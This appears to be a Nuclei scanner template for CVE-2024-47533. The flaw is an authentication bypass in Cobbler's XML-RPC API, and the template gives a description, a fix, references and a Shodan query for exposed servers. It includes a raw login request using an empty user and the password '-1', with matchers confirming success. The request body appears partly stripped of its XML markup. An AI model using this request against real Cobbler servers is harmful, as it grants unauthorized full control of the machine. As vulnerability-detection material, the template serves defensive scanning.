id: CVE-2024-47533
info:
name: Cobbler 'XML-RPC' - Authentication Bypass
author: songyaeji
severity: critical
description: |
Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
impact: |
Anyone with network access can connect to Cobbler XML-RPC with default credentials and make arbitrary changes, gaining full control.
remediation: |
Update Cobbler to version 3.2.3 or 3.3.7 or later.
reference:
- https://github.com/cobbler/cobbler/commit/32c5cada013dc8daa7320a8eda9932c2814742b0
- https://github.com/cobbler/cobbler/commit/e19717623c10b29e7466ed4ab23515a94beb2dda
- https://github.com/cobbler/cobbler/security/advisories/GHSA-m26c-fcgh-cp6h
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-47533
cwe-id: CWE-287
epss-score: 0.03948
epss-percentile: 0.89325
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Cobbler Web Interface"
tags: cve,cve2024,cobbler,auth-bypass,unauth,xmlrpc,vuln
http:
- raw:
- |
POST /cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
login
-1
matchers-condition: and
matchers:
- type: word
part: body
words:
- ""
- ""
condition: and
- type: word
part: content_type
words:
- "text/xml"
- type: status
status:
- 200
- type: word
part: body
words:
- "0"
- "faultString"
condition: or
negative: true
# digest: 4a0a00473045022100ba059bfd24b364a65d7217601fa75527930af6c7d680623e64c9ebb9610931f602206895be8a58bcdd602f9ed84b3585f5c5ae6100e19d695a342670e3d912439098:922c64590222798bb761d5b6d8e72950